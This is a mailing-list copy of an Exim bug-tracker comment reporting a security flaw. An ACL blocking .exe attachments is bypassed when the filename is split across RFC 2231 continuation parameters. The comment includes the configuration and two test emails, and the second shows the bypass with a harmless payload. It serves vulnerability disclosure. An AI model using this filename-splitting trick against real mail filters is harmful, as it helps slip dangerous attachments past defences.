https://bugs.exim.org/show_bug.cgi?id=3099
--- Comment #4 from Heiko Schlichting <exim@???> ---
I can confirm this bug. It looks like a serious security issue to me. There
should be a CVE number for it and it should definitely be fixed before Exim
4.98 is released.
Can be reproduced as follows:
-----
acl_smtp_mime = acl_check_mime
acl_check_mime:
deny message = This message contains an attachment of a type that we
do not accept ($mime_filename).
condition = ${if match {${lc:$mime_filename}}{\N\.exe$\N}}
accept
-----
Sending the following mails with "exim -t". The second mail should NOT be
accepted.
---------------------------- deny ---------------------------
From: localpart@???
To: localpart@???
Subject: Bug 3099 (1)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_695039"
------=_MIME_BOUNDARY_000_695039
Content-Type: text/plain
This is a test mailing
------=_MIME_BOUNDARY_000_695039
Content-Type: application/octet-stream
Content-Disposition: attachment;
filename="example.exe"
Content-Transfer-Encoding: BASE64
QmVpc3BpZWwK
------=_MIME_BOUNDARY_000_695039--
---------------------------- accept ---------------------------
From: localpart@???
To: localpart@???
Subject: Bug 3099 (2)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_695039"
------=_MIME_BOUNDARY_000_695039
Content-Type: text/plain
This is a test mailing
------=_MIME_BOUNDARY_000_695039
Content-Type: application/octet-stream
Content-Disposition: attachment;
filename*0*="example3";
filename*1*=".exe"
Content-Transfer-Encoding: BASE64
QmVpc3BpZWwK
------=_MIME_BOUNDARY_000_695039--
--
You are receiving this mail because:
You are on the CC list for the bug.
--
## subscription configuration (requires account):
##
https://lists.exim.org/mailman3/postorius/lists/exim-dev.lists.exim.org/
## unsubscribe (doesn't require an account):
## exim-dev-unsubscribe@???
## Exim details at
http://www.exim.org/
## Please use the Wiki with this list -
http://wiki.exim.org/